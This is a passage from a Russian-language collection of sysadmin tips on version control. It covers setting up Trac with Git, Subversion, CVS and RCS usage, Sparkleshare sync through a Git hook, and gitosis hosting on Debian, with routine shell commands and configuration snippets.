/srv/trac/.htpasswd 'Trac' admin htdigest -c /srv/git/.htpasswd 'Git' admin Этими командами мы создали пользователя "admin". Для дальнейшего добавления пользователей или для смены паролей, используется та же команда, только без "-c". На этом этапе системная конфигурация закончена. Добавим новый проект под кодовым названием pr1: trac-admin /srv/trac/pr1 initenv install -d /srv/git/pr1/.git git --bare init /srv/git/pr1/.git Подкорректируем настройки нашего проекта в файле (/srv/trac/pr1/conf/trac.ini): Включим поддержку git путем добавления в конец файла двух строчек: [components] tracext.git.* = enabled И корректированием: sed -i 's/^repository_type =.*$/repository_type = git/g' /srv/trac/pr1/conf/trac.ini sed -i 's/^repository_dir =.*$/repository_dir = \\/srv\\/git\\/pr1\\/.git/g' /srv/trac/pr1/conf/trac.ini Теперь дадим пользователю "admin" привелегии trac админа: trac-admin /srv/trac/pr1 permission add admin TRAC_ADMIN Если мы не хотим запретить доступ к нашему трэк серверу не авторизированным пользователям, то: trac-admin /srv/trac/pr1 permission remove anonymous '*' Ну и в конце подкорректируем права доступа к директориям, где будут храниться данные: chown -R apache:apache /srv/{trac,git} Перезагрузим apache: systemctl httpd restart Теперь можно зайти на trac сервер в наш проект по адресу: http://trac-server.loc/trac/pr1 Для работы с git используйте адрес: http://trac-server.loc/git/pr1 Например при команде: git clone http://trac-server.loc/git/pr1 Будет запрошено имя пользователя и пароль для авторизации.

Определение типа окончания строк (Windows или Unix) для текстовых файлов в небольшом Web-проекте Автор: Kroz [комментарии]

Ситуация: небольшой Web-проект разрабатывается несколькими людьми на разных ОС: Windows и Linux. В результате в некоторых файлах перевод строк сделан в стиле Windows, в некоторых - в стиле Unix. Неудобство состоит в том, что если какая-то "интеллектуальная" программа поменяет тип перевода строк, система контроля версий Subversion помечает все строки как изменившиеся, и нужны дополнительные усилия чтобы определить реальные изменения. Поэтому было принято решение определить тип перевода строк в каждом файле, и применить соответствующие меры (например, использовать атрибут svn:eol-style в subversion). Скрипт простой, легко кастомизируется под автоматическую конвертацию (с помощью dos2unix), другие типы файлов, определение стиля Macintosh (в данном случае различается только Windows и Unix): for FILE in `find -iname '*.php' -or -iname '*.css' -or -iname '*.js' -or -iname '*.txt' -or -iname '*.xml'` ; do echo -n "$FILE ... " ; WIN=`grep -P "\\r$" $FILE | head`; if [ -z "$WIN" ] ; then echo "Unix" else echo "Windows" fi done

Получение инкрементальных diff-файлов для subversion Автор: Аноним [комментарии]

Для того чтобы в subversion получить инкрементальный diff между ревизиями ("как в git"), чтобы было проще изучить изменения, можно использовать следующий скрипт: #!/bin/sh url="$1" rev_start=$2 rev_end=$3 rev=$rev_start while [ "$rev" -lt "$rev_end" ] do rold=$rev rev=`expr $rev + 1` fn=`printf %08d-%08d.diff $rold $rev` echo $fn svn diff $url@$rold $url@$rev > $fn done Результат - файлы с именами xxxxxxxx-xxxxxxxy.diff, где xxxxxxxx и xxxxxxxy - номера ревизий.

Использование Git в Vim (доп. ссылка 1) Автор: felicson [комментарии]

Ниже представлены два плагина, которые позволяют из Vim работать с Git. Требования к плагину были простыми: * Показывать активную ветку текущего файла * Переключение между разными ветками, без выхода из Vim * Кроссплатформенность В итоге удалось найти два законченных плагина, которые удовлетворяют данным требованиям: git-branch-info.vim и git.vim git-branch-info.vim Этот плагин был сделан для показа информации о текущей ветке в статусной строке. set laststatus=2 " Включение строки статуса внизу редактора set statusline=%{GitBranchInfoString()} В дополнение к информации о текущей ветке, он может показать список всех веток в текущем репозитории через пункт меню (только в Gvim) и позволяет проверить/извлечь определенную ветку. Одно замечание по этому плагину - он был разработан только для пользователей Linux и не будет работать в Windows в том виде в каком он есть. git.vim Git.vim более комплексный плагин, который позволяет пользователю производить больше действий с Git не покидая окружения Vim. Домашняя страница на GitHub http://github.com/motemen/git-vim/tree/master перечисляет все возможности, доступные благодоря этому плагину. Функция вызываемая для установки статусной строки называется - GitBranch(). Итак, строки добавляемые в .vimrc должны быть такими: set laststatus=2 set statusline=%{GitBranch()} Но к сожалению, здесь есть ошибка в функции GitBranch(). Снова выручает GitHub, проект был форкнут и доступен здесь http://github.com/amjith/git-vim . Автору отправлен запрос с указанием ошибки. Несколько других возможностей этого плагина продемонстрированы ниже. Этот плагин поставляется с файлами проверки синтаксиса, которые подсвечивают git-log, git-diff и git commit сообщения. Подсветку синтаксиса можно посмотреть на следующих снимках. ":GitCommit" открывает отдельное окно для ввода информации о коммите, и коммитит текущий файл в репозиторий. Если файлы не добавлены в индекс, то плагин автоматически вызывает git commit с опицей -a для внесения всех измененных файлов в индекс и коммитит их в репозиторий. ":GitDiff" открывает отдельное окно с выводом команды git diff по текущему файлу. ":GitLog" показывает лог сообщение коммита по текущему файлу. ":GitBlame" показывает изменения файла в виде списка однострочных записей, по одному имени пользователя на строку в вертикальном окне. Это экспериментальная функция, для слияния конфликтующих файлов использует Vimdiff, ":GitVimDiffMerge" и другие команды git можно вызвать из Vim используя :Git.

Организация файлового хранилища на базе Git-репозитория при помощи Sparkleshare (доп. ссылка 1) [комментарии]

В рамках проекта Sparkleshare развивается свободный движок для организации похожих на Dropbox online-хранилищ, непосредственное хранение данных в которых осуществляется в любом Git-репозитории. Использование Git позволяет задействовать элементы версионного контроля для отслеживания изменений в файлах, давая возможность отследить все изменения и при необходимости вернуться к состоянию определенного файла в прошлом. С технической стороны SparkleShare является Git-клиентом, оптимизированным для хранения и обмена файлами. Программа может использоваться не только для хранения своих файлов, но и для организации обмена файлами с другими людьми или для обеспечения синхронизации данных между домашним и рабочим ПК. SparkleShare поддерживает шифрование хранимых данных, что позволяет использовать публичные Git-репозитории не опасаясь возможной утечки информации. Например, можно использовать Git-репозитории в публичных сервисах Gitorious и GitHub. Рассмотрим процесс развертывания Sparkleshare-хранилища под управлением Fedora Linux с целью организации доступного дома и на работе хранилища. Для организации рабочего процесса создадим в домашней директории каталог Sparkleshare, в котором будем создавать подкаталоги, соответствующие текущим проектам. В качестве первичного хранилища будет использовать Git-репозиторий на собственном сервере, доступ к которому организован через SSH. Одновременно настроим на сервере доступность сохраняемых файлов через web, разместив клон репозитория в директории ~/public_html. Установка Sparkleshare на локальной клиентской машине. Добавляем соответствующий YUM-репозиторий, в котором содержатся готовые пакеты с Sparkleshare: cd /etc/yum.repos.d sudo curl -O http://repos.fedorapeople.org/repos/alexh/sparkleshare/fedora-sparkleshare.repo Устанавливаем Sparkleshare sudo yum install -y sparkleshare ssh-askpass Удаляем пакет nautilus-python, так как иначе при работе Sparkleshare наблюдается крах Nautilus. sudo yum remove -y nautilus-python PS. Пользователи Ubuntu могут загрузить Sparkleshare из PPA-репозитория: sudo add-apt-repository ppa:pdffs/sparkleshare sudo apt-get update sudp apt-get install sparkleshare Настройка Git-репозитория Создаем Git-репозиторий на внешнем сервере, который будет использован в качестве первичного хранилища: git init --bare repo.git Для работы на сервере должны быть установлены пакеты с git и openssh-server. Проводим первичное клонирование репозитория в директорию ~/public_html, чтобы файлы были доступны через web: cd ~/public_html git clone repo.git cd repo Создаем тестовый файл: echo 'Fedora 15 rocks!' >> test.txt Добавляем файл в Git и принимаем изменения. git add test.txt git commit test.txt -m 'initial commit2' Создаем начальную ветку: git push origin master Подключаем свои локальные машины к репозиторию На локальной рабочей машине останавливаем рабочий процесс Sparkleshare и клонируем созданный на прошлом шаге репозиторий sparkleshare stop cd ~/SparkleShare git clone логин@хост:/home/логин/repo.git Проверяем содержимое: cd ~/SparkleShare/repo ls Меняем содержимое тестового файла echo 'Pandas rule.' >> test.txt; Применяем изменения: git commit -a -m 'panda PSA' git push На удаленном сервере, где создан базовый Git-репозиторий принимаем изменения: cd ~/public_html/repo git pull Проверяем, изменилось ли содержимое test.txt: cat test.txt Если все работает нормально, то запускаем на локальной машине Sparkleshare которые возьмет в свои руки выполнение рутинных операций по отслеживанию изменений и синхронизации данных на внешний сервер. sparkleshare start Настраиваем автозапуск Sparkleshare в GNOME: cp /usr/share/applications/sparkleshare.desktop ~/.config/autostart Заходим в директорию с репозиторием SparkleShare cd ~/SparkleShare/repo и создаем там новый тестовый файл: echo '42' >> theanswer.txt На удаленном сервере клонируем репозиторий и убеждаемся, что новый файл автоматически был помещен в Git: cd ~/public_html/repo git pull ls Все работает. Создаем автоматически обновляемое зеркало для просмотра репозитория из web. Настроим автоматическое клонирование репозитория удаленном сервере, с которого будет осуществлена раздача файлов через Web. Для работы нам понадобиться настроить удаленный вход со второй машины на первую по SSH по ключам, без ввода пароля. Инструкцию по настройке можно найти здесь. На удаленном сервере переходим в базовую директорию с Git-репозиторием (не клоном) cd ~/git.repo/hooks Добавляем скрипт, который будет срабатывать при добавлении файлов в репозиторий. В этом скрипте автоматически будет выполнять локальное клонирование репозитория для его видимости в web. Создадим скрипт post-receive в директории ~/git.repo/hooks (не забудьте подставить реальное значение вместо "логин"): #!/bin/sh while read oldrev newrev refname do true done cd /home/user/public_html/repo GIT_DIR=/home/логин/public_html/repo/.git git pull Проверим, создав на локальной системе третий тестовый файл: cd ~/SparkleShare/repo echo 'Fedora 15' >> latestfedora.txt Переходим на удаленном сервере в директорию с клоном репозитория для web и проверяем появился ли новый файл: cd ~/public_html/repo ls Подсказки по настройке работы Sparkleshare c Github и Gitorious можно найти на странице http://sparkleshare.org/help/

Основы использования Subversion для управления исходными текстами (доп. ссылка 1) [комментарии]

Создание SVN-репозитория: svnadmin create путь_к_репозиторию например svnadmin create ~/svn/project1 Импорт в репозиторий дерева исходных текстов: svn import [директория] [URL] -m "комментарий" например svn import public_html file:///home/user/svn/project1 \ -m "первый импорт кода" В нашем случае URL с путем к репозиторию указывает на локальную файловую систему. Просмотр содержимого репозитория: svn list [URL] svnlook tree [repository path] например svn list file:///home/user/svn/project1 svnlook tree ~/svn/project1 Извлечение рабочей копии исходных текстов из репозитория: svn checkout [URL] [директория для сохранения] например svn checkout file:///home/user/svn/project1 test срез содержимого репозитория будет сохранен в директорию test, в которой можно начать редактирование файлов. Статус изменений в рабочей копии можно посмотреть командой svn status Первый символ в выводе определяет характер изменений: ' ' без изменений 'A' добавлено 'C' конфликт 'D' удалено 'I' игнорировано 'M' изменено 'R' заменено 'X' добавлена новая директория '?' элемент для которого не ведется версионный контроль (новый файл) '!' элемент отсутствует (удалено без подтверждения в svn) Перед коммитом изменений необходимо убедиться в отсутствии файлов с признаками "?" и "!", добавив новые файлы через команду "svn add" и удалив ненужные через "svn delete" или восстановив удаленные по ошибке через "svn update". Типичные операции с файлами в рабочей копии. Добавление новых файлов, ранее отсутствовавших в репозиторий (команда выполняется находясь в директории с рабочей копией): svn add имя_файла Удаление ненужных файлов из репозитория : svn delete имя_файла если файл по ошибке был удален вручную, то восстановить его можно командой svn update имя_удаленного_файла Просмотр лога изменений: svn log Просмотра лога изменений только в рамках заданной ревизии: svn log -r 10 Подтверждение (коммит) внесенных изменений в основной репозиторий (номер ревизии при каждом коммите автоматически увеличивается на 1). svn commit Если репозиторием пользуются другие разработчики, после совершения коммита следует синхронизировать состав рабочей директории, в случае если с момента создания локальной копии в репозиторий были внесены изменения другими разработчиками. svn update Для формирования копии части репозитория без служебных данных (без .svn поддиректорий), например, для размещения в web, нужно использовать команду: svn export [URL репозитория или файла/директории в нем] например svn export file:///home/user/svn/project1/dir/file.html svn export file:///home/user/svn/project1/dir Проверка номера версии текущей рабочей директории: svnversion Если в ответ будут показаны цифры, значит все изменения зафиксированы коммитом. Если перед цифрами указана буква "M", значит в рабочей директории имеются измененные файлы, ожидающие передачи в репозиторий. Если в выводе фигурирует несколько цифр, разделенных двоеточием, значит после вашего коммита в репозитории другим участником были внесены изменения, которые следует синхронизировать через "svn update". Для просмотра различий между двумя ревизиями одного файла в рабочей директории необходимо выполнить: svn diff имя_файла Для возврата рабочей директории к прошлой ревизии (отмены изменений) можно использовать команду: svn merge -r 4:1 file:///home/user/svn/project1 где, 4 - текущая ревизия, а 1 - ревизия на которую осуществляется откат рабочей директории. Для переименования репозитория можно использовать следующую схему. Создает новый пустой репозиторий: svnadmin create новое_имя Делаем бэкап старого репозитория в файл: svnadmin dump ~/svn/старое_имя > old_repo.dump Загружаем дамп с резервной копией в новый репозиторий: svnadmin load ~/svn/новое_имя < old_repo.dump Удаляем старый репозиторий: rm -rf ~/svn/старое_имя

Пример работы с персональным Git репозиторием [комментарии]

Имеем две машины: "рабочая" для хранения базового репозитория и работающего проекта, и локальная, на которой будем вносить в этот репозиторий правки. Для создания нового репозитория в созданной директории "проект" нужно перейти в эту директорию и выполнить: git init А затем добавить ранее созданные там файлы: git add . Для того, чтобы с локальной машины по SSH зайти на "хост" под именем "логин" и клонировать на свою машину репозиторий, находящийся с директории "/home/логин/проект" (префикс ssh:// добавляктся по умолчанию) git clone логин@хост:/home/логин/проект master Для того, чтобы через некоторое время синхронизировать из основного или другого репозитория изменения, нужно выполнить: git pull логин@хост:/home/логин/проект master Локальный клон сделан. Далее правим в созданной на локальной машине "проект" git commit -a -m "комментарий о проделанной работе" Если ошиблись и нужно вернуть все обратно: git revert Чтобы зафиксировать версию (если наступил такой момент): git tag тэг_версии Когда все готово, помещаем изменения в основой репозиторий: git push логин@хост:/home/логин/проект master Для того, чтобы сгенерировать рабочий проект (в нашем случае сайт) на рабочем сервере нужно выполнить (в директории с проектом): git update-server-info git checkout HEAD -f Вернуться к прошлой ревизии: git checkout HEAD~1 К позапрошлой: git checkout HEAD~2 Построить проект с заданным номером версии: git checkout тэг_версии

Создание хостинга для git репозитория в Debian Linux (доп. ссылка 1) Автор: Kirill A. Korinskiy [комментарии]

Как оказалось, в современном debian создать хостинг для git репозитория, не просто просто, а очень просто. Начнем мы ставить, на сервере, софт. Понадобиться нам gitosis и git-core. Говорим волшебное заклинание: sudo aptitude install gitosis git-core Следующим шагом надо создать gitosis хостинг: sudo -H -u git gitosis-init < .ssh/authorized_keys2 Да, авторизация будет происходить только по ключам. Дальше, надо разрешить выполнение post-update хука: sudo chmod 755 /srv/gitosis/repositories/gitosis-admin.git/hooks/post-update Теперь нам нужен git-daemon, который бы раздавал все что мы делаем (этот шаг нужен, если мы хотим разрешить всем read only доступ): sudo update-inetd --group OTHER --add 'git\tstream\ttcp\tgitosis\tgitosis\t/usr/bin/git\tgit daemon \ --inetd --export-all --base-path=/srv/gitosis/repositories/' Все, на этом настройка сервера закончена. Теперь начинаем настраивать, собственно, хостинг. Прелесть этой системы в том что все управление делается через git :). Давайте, для начала, возьмем себе административный репозиторий: git clone gitosis@SERVER:gitosis-admin.gi Мы получим репозиторий, в котором будет лежать директория keydir. В ней лежат публичные ключи людей, которые имеют доступ к нашему хостингу. В качестве имени файла используется его имя из открытого ключа. Т.е. что бы добавить человека нужно, просто, добавить его ключ. Для примера, мы создадим группу developer и testers, группа developers будет иметь доступ к двум проектам на запись (project1-dev и project2-dev) и к проекту группы testers на чтение. Группы testers наоборот. [group quux] members = joe smith writable = projeect1-dev project2-dev readonly = testers [group quux] members = max john writable = testers readonly = projeect1-dev project2-dev Теперь осталось только сделать commit. Если сделать доступ, через git-daemon, то любой, сможет прочитать эти проекты.

Хранение файлов конфигурации в RCS (доп. ссылка 1) Автор: mahoro [комментарии]

Система управления версиями RCS пригодилась для сохранения резервных копий файлов конфигурации и нескольких Perl модулей, активная разработка которых уже завершена, но мелкие исправления и переделки еще бывают. Итак, для работы с RCS используются следующие команды - ci (импорт файлов в репозиторий), co (экспорт), rcs (манипулирование флагами файлов и проч.), rcsdiff, rlog. Пусть file - файл, который требуется передать в управление RCS. ls -la > file Первым делом нужно создать каталог для репозитория mkdir RCS Затем импортировать файл. В общем случае это делается так: ci file Исходный файл _перемещается_ в репозиторий (если он там уже есть, то под новой версией). Извлечь файл из репозитория можно командой: co file (файл будет иметь права доступа 444) Чтобы изменить файл, нужно установить его блокировку и установить права доступа, разрешающие запись rcs -l file chmod o+w file Чтобы записать изменения нужно снова выполнить ci file Итак, это все, что нужно для того чтобы начать работать. Теперь пара команд, для того, чтобы работать было удобно :) co -l file - синоним co file; rcs -l file; chmod 644 file - извлечь, заблокировать файл, разрешить запись. ci -u file - синоним ci file; co file - сохранить файл и извлечь рабочую копию ci -l file - синоним ci file; co -l file - сохранить файл, сделать co -l В случае, если с файлом работает один пользователь, то в блокировках нет никакого смысла, и от них можно отказаться: ci -l file (первоначальный импорт) rcs -U file (установка перманентной блокировки) vi file ci -l file (файл сохранится в RCS и будет готов к дальнейшей работе) Далее, самые распространненые задачи: Извлечь файл из репозитория co file co -l file (синоним co file, rsc -l file -- извлечение и блокировка) co -r1.2 file (извлечение определенной версии файла) Посмотреть различия между текущей (=рабочей) версией и последней, сохраненной в RCS rcsdiff file Посмотреть различия между произвольными двумя версиями rcsdiff -r1.1 -r1.2 file Посмотреть логи редактирования файла rlog file Дальнейшее чтение: rcsintro(1), rcs(1), co(1), ci(1).

Быстрая установка Subversion на FreeBSD (доп. ссылка 1) Автор: Alex Ryabov [комментарии]

Процедура установки довольно проста, но, как часто бывает, предварительное прочтение инструкции экономит вам кучу времени. Здесь я рассматриваю простейший случай: репозиторий доступен только по HTTP/HTTPS (настройку SSL приводить не буду), разработчиков немного, поэтому персональных разрешений на директории мы не выставляем.

Сначала нужно установить Apache (я использую версию 2.2):

cd /usr/ports/www/apache22 make WITH_BERKELEYDB=db42 install

либо, если он у вас уже установлен, пересобрать его с поддержкой Berkeley DB:

portupgrade -f -m "WITH_BERKELEYDB=db42" www/apache22

Далее собираем и ставим SVN (тут, если ваш Apache собран без BDB, сборка прервется сообщением об ошибке):

cd /usr/ports/devel/subversion make WITH_MOD_DAV_SVN= install

Всё необходимое установлено. Теперь нужно создать репозиторий и проект в нем:

mkdir /usr/local/www/repo svnadmin create /usr/local/www/repo/project chown -R www:www /usr/local/www/repo

Файл с паролями пользователей:

htpasswd -c /usr/local/etc/svn.passwd user password

Внести настройки модуля dav_svn в конфиг Apache и рестартовать веб-сервер:

edit /usr/local/etc/apache22/httpd.conf <Location /svn> DAV svn SVNParentPath /usr/local/www/repo AuthType Basic AuthName "Subversion repository" AuthUserFile /usr/local/etc/svn.passwd Require valid-user </Location> apachectl restart

Чтобы проверить, как работает наш репозиторий, можно поставить графический клиент (например, TortoiseSVN) или выполнить от имени пользователя user команду:

svn co http://server.net/svn/project/ project

Что читать дальше? По настройке и улучшению безопасности сервера: Setting up a Secure Subversion Server и Accessing Secure Subversion Servers (две статьи от Дрю Лавинь, рассматривается настройка без веб-сервера с доступом по SSH и более сложные случаи раздачи прав пользователей), Using Subversion for Collaborative Development.

По использованию: Управление версиями в Subversion.

Пример настройки subversion под Linux (доп. ссылка 1) Автор: madskull [комментарии]

Сервер: > svnadmin create /path/to/repos # создание репозитория > cat /path/to/repos/conf/svnserve.conf [general] anon-access = none auth-access = write password-db = passwd realm = My First Repository > cat /path/to/repos/conf/passwd [users] user = PaSsW0Rd > cat /etc/xinetd.d/svn service svn { flags = REUSE socket_type = stream wait = no user = root server = /usr/bin/svnserve server_args = -i -r /path/to/repos log_on_failure += USERID disable = no } > /etc/rc.d/xinetd start Клиент: # создаем временный каталог с проектом > mv /path/to/project /tmp # импортируем его в svn > svn import /tmp/project svn://SERVER/project # восстанавливаем проект для работы > cd /path/to > svn checkout svn://SERVER/project # запись изменений на сервер > cd /path/to > svn commit -m "что-то тут я изменил" # получить последнюю версию с сервера > cd /path/to > svn update В документации сказано, что надо в /path/to/project создать каталоги branches tags trunk и файлы проекта поместить в trunk. Однако, у меня работает и так.

Как можно узнать какие branch имеются в удаленном CVS репозитории (доп. ссылка 1) Автор: butcher [обсудить]

На сколько я знаю, нет способа 100%. Можно попробовать так, пример для gnumric'а: Сначала нужно скачать один из файлов дистрибутива: cvs -d:pserver:anonymous@anoncvs.gnome.org:/cvs/gnome login cvs -d:pserver:anonymous@anoncvs.gnome.org:/cvs/gnome co gnumeric/ChangeLog cvs -d:pserver:anonymous@anoncvs.gnome.org:/cvs/gnome status -v gnumeric/ChangeLog

Подсказка по CVS командам [обсудить]

Добавление нового файла/директории cvs add filename Удаление файла из репозитория cvs remove filename Обновление версии файла в репозитории cvs commit filename Обновление рабочей ветки из репозитория cvs update Создание рабочей ветки из репозитория cvs checkout module_name Создание репозитория cvs -d /home/cvsroot init Импорт модулей в репозиторий cvs -d /home/cvsroot import example example_project ver_0-1 Использование тэгов cvs tag release-1-0, cvs checkout -r tagname Ветвление cvs tag -b branchtag Блокировка файлов cvs watch add|remove -a edit|unedit|commit|all files Настройка доступа к CVS репозиторию по сети cvs -d :ext:cvs.example.com.au:/usr/local/cvsroot checkout sample

Как экспортировать релиз из CVS дерева. [обсудить]

cvs rtag release1_2 module_name cvs export -r release1_2 module_name Для формирования патча использовать: diff -u --recursive --new-file (diff -urN)

Как запустить CVS сервер. [обсудить]

В /etc/inetd.conf 2401 stream tcp nowait cvs_user /usr/sbin/tcpd /usr/bin/cvs -f --allow-root=/usr/local/cvsroot pserver При этом список пользователей хранится в файле: /usr/local/cvsroot/CVSROOT/passwd (формат: user:crypted_passwd) Настройки: /usr/local/cvsroot/CVSROOT/config PreservePermissions=n SystemAuth=no

Как скачать дерево исходников с удаленного CVS сервера [обсудить]

export CVSROOT=:pserver:anonymous@remote_cvs_server_host:/usr/local/cvsroot cvs login cvs checkout cvs logout

Версия для печати

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2026 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру